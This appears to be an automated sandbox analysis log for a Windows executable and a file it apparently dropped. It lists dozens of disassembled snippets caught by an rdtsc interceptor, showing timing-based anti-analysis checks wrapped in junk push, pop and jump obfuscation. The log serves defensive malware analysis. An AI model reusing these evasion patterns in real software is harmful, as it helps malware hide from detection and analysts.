Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BFF39 second address: 6BFF45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3402 second address: 6C3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007FA6C4C2AB36h 0x00000011 jmp 00007FA6C4C2AB3Eh 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jg 00007FA6C4C2AB40h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C377A second address: 6C378E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jnp 00007FA6C4D39092h 0x0000000c js 00007FA6C4D3908Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C378E second address: 6C37A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6C4C2AB3Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C39FB second address: 6C3A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A01 second address: 6C3A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A05 second address: 6C3A1C instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FA6C4D39086h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A1C second address: 6C3A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C3A2A second address: 6C3A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4D39099h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8146 second address: 6C816F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jnl 00007FA6C4C2AB36h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007FA6C4C2AB47h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5C70 second address: 5E5C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50496 second address: 4D504D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4C2AB48h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504D0 second address: 4D504DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504DF second address: 4D504F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504F7 second address: 4D504FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D504FB second address: 4D50512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FA6C4C2AB3Ah 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50512 second address: 4D50524 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA6C4D3908Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50524 second address: 4D5058E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6C4C2AB42h 0x00000008 and al, 00000078h 0x0000000b jmp 00007FA6C4C2AB3Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA6C4C2AB44h 0x0000001c adc ax, 7CD8h 0x00000021 jmp 00007FA6C4C2AB3Bh 0x00000026 popfd 0x00000027 mov esi, 1050F78Fh 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6C4C2AB41h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5058E second address: 4D505C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov si, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FA6C4D39091h 0x00000016 sbb ax, EDD6h 0x0000001b jmp 00007FA6C4D39091h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50601 second address: 4D50653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4C2AB41h 0x00000008 pushfd 0x00000009 jmp 00007FA6C4C2AB40h 0x0000000e adc cx, 50B8h 0x00000013 jmp 00007FA6C4C2AB3Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push 0E128D5Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA6C4C2AB42h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50653 second address: 4D50681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 67868EC9h 0x0000000f jmp 00007FA6C4D39094h 0x00000014 call 00007FA73590CA02h 0x00000019 push 759227D0h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [759B0140h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50681 second address: 4D50685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50685 second address: 4D506A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506A2 second address: 4D506CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4C2AB3Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506CA second address: 4D506DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506DA second address: 4D506DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506DE second address: 4D506EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506EF second address: 4D506F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506F3 second address: 4D506F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506F7 second address: 4D506FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D506FD second address: 4D5070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D5070F second address: 4D50728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50728 second address: 4D50743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50743 second address: 4D507D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov al, byte ptr [edx] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA6C4C2AB43h 0x00000013 xor si, B81Eh 0x00000018 jmp 00007FA6C4C2AB49h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FA6C4C2AB40h 0x00000024 sub ch, 00000018h 0x00000027 jmp 00007FA6C4C2AB3Bh 0x0000002c popfd 0x0000002d popad 0x0000002e inc edx 0x0000002f jmp 00007FA6C4C2AB46h 0x00000034 test al, al 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FA6C4C2AB47h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507D6 second address: 4D507DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507DC second address: 4D507E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507E0 second address: 4D507D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA6C4D38FDCh 0x00000011 mov al, byte ptr [edx] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA6C4D39093h 0x0000001a xor si, B81Eh 0x0000001f jmp 00007FA6C4D39099h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007FA6C4D39090h 0x0000002b sub ch, 00000018h 0x0000002e jmp 00007FA6C4D3908Bh 0x00000033 popfd 0x00000034 popad 0x00000035 inc edx 0x00000036 jmp 00007FA6C4D39096h 0x0000003b test al, al 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FA6C4D39097h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D507FC second address: 4D50839 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6C4C2AB3Dh 0x00000008 add cx, 9276h 0x0000000d jmp 00007FA6C4C2AB41h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 sub edx, esi 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 mov edi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50839 second address: 4D50853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50853 second address: 4D508CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b push eax 0x0000000c mov bx, C7E6h 0x00000010 pop edi 0x00000011 popad 0x00000012 lea ebx, dword ptr [edi+01h] 0x00000015 jmp 00007FA6C4C2AB49h 0x0000001a mov al, byte ptr [edi+01h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA6C4C2AB3Ch 0x00000024 sub ax, 76B8h 0x00000029 jmp 00007FA6C4C2AB3Bh 0x0000002e popfd 0x0000002f call 00007FA6C4C2AB48h 0x00000034 mov dh, cl 0x00000036 pop ebx 0x00000037 popad 0x00000038 inc edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D508CC second address: 4D508DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D508DB second address: 4D50959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov edi, 5F300AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6C4C2AB43h 0x00000017 adc ecx, 0557E33Eh 0x0000001d jmp 00007FA6C4C2AB49h 0x00000022 popfd 0x00000023 jmp 00007FA6C4C2AB40h 0x00000028 popad 0x00000029 jne 00007FA7357F2C84h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushfd 0x00000033 jmp 00007FA6C4C2AB3Ch 0x00000038 xor eax, 37986768h 0x0000003e jmp 00007FA6C4C2AB3Bh 0x00000043 popfd 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50959 second address: 4D50977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FA6C4D39096h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50977 second address: 4D50996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov ecx, edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007FA6C4C2AB43h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50996 second address: 4D509F4 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FA6C4D39095h 0x0000000d xor esi, 45B14196h 0x00000013 jmp 00007FA6C4D39091h 0x00000018 popfd 0x00000019 popad 0x0000001a shr ecx, 02h 0x0000001d pushad 0x0000001e movzx ecx, di 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f pushad 0x00000030 mov cl, 27h 0x00000032 mov dh, BAh 0x00000034 popad 0x00000035 mov ecx, edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FA6C4D39091h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509F4 second address: 4D509FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509FA second address: 4D509FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D509FE second address: 4D50A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50A02 second address: 4D50AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 03h 0x0000000b jmp 00007FA6C4D3908Fh 0x00000010 rep movsb 0x00000012 pushad 0x00000013 jmp 00007FA6C4D39094h 0x00000018 pushfd 0x00000019 jmp 00007FA6C4D39092h 0x0000001e sbb cl, FFFFFFD8h 0x00000021 jmp 00007FA6C4D3908Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000002f jmp 00007FA6C4D39096h 0x00000034 mov eax, ebx 0x00000036 jmp 00007FA6C4D39090h 0x0000003b mov ecx, dword ptr [ebp-10h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA6C4D39097h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AA1 second address: 4D50AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6C4C2AB3Ch 0x00000017 adc si, 8F28h 0x0000001c jmp 00007FA6C4C2AB3Bh 0x00000021 popfd 0x00000022 push ecx 0x00000023 mov cx, bx 0x00000026 pop edi 0x00000027 popad 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AF1 second address: 4D50AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AF5 second address: 4D50AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50AFB second address: 4D50B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f call 00007FA6C4D39093h 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50B2C second address: 4D50601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 call 00007FA6C4C2AB40h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 movsx edx, cx 0x00000013 pushfd 0x00000014 jmp 00007FA6C4C2AB48h 0x00000019 add ax, 78A8h 0x0000001e jmp 00007FA6C4C2AB3Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop ebx 0x00000026 jmp 00007FA6C4C2AB46h 0x0000002b leave 0x0000002c jmp 00007FA6C4C2AB40h 0x00000031 retn 0008h 0x00000034 cmp dword ptr [ebp-2Ch], 10h 0x00000038 mov eax, dword ptr [ebp-40h] 0x0000003b jnc 00007FA6C4C2AB35h 0x0000003d push eax 0x0000003e lea edx, dword ptr [ebp-00000590h] 0x00000044 push edx 0x00000045 call esi 0x00000047 push 00000008h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FA6C4C2AB48h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C36 second address: 4D50C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 7D9D5185h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, si 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C4C second address: 4D50C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C52 second address: 4D50C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C56 second address: 4D50CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA6C4C2AB46h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA6C4C2AB3Eh 0x0000001a sbb cx, EED8h 0x0000001f jmp 00007FA6C4C2AB3Bh 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 movzx esi, dx 0x0000002a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6B3 second address: 57F6B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6B8 second address: 57F6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6BE second address: 57EEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push dword ptr [ebp+122D15A1h] 0x00000011 stc 0x00000012 pushad 0x00000013 jmp 00007FA6C4D3908Bh 0x00000018 add bx, F75Ah 0x0000001d popad 0x0000001e call dword ptr [ebp+122D39F6h] 0x00000024 pushad 0x00000025 xor dword ptr [ebp+122D1CE9h], esi 0x0000002b xor eax, eax 0x0000002d clc 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 pushad 0x00000033 mov edx, dword ptr [ebp+122D3B0Ch] 0x00000039 jmp 00007FA6C4D39094h 0x0000003e popad 0x0000003f mov dword ptr [ebp+122D3BECh], eax 0x00000045 jbe 00007FA6C4D3908Fh 0x0000004b mov dword ptr [ebp+122D33E1h], edi 0x00000051 mov esi, 0000003Ch 0x00000056 jne 00007FA6C4D3908Ch 0x0000005c mov dword ptr [ebp+122D1DDCh], esi 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 sub dword ptr [ebp+122D1CE9h], esi 0x0000006c lodsw 0x0000006e stc 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jc 00007FA6C4D390A3h 0x00000079 jg 00007FA6C4D3909Dh 0x0000007f jmp 00007FA6C4D39093h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jmp 00007FA6C4D3908Ch 0x0000008d pushad 0x0000008e mov cl, BCh 0x00000090 popad 0x00000091 nop 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FA6C4D3908Fh 0x00000099 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57EEBC second address: 57EED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB40h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700B3B second address: 700B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39091h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700B50 second address: 700B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700FA5 second address: 700FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FA6C4D39086h 0x0000000f jmp 00007FA6C4D39093h 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7012A1 second address: 7012B1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7012B1 second address: 7012B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BC2 second address: 702BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BCC second address: 702BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BD0 second address: 702BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
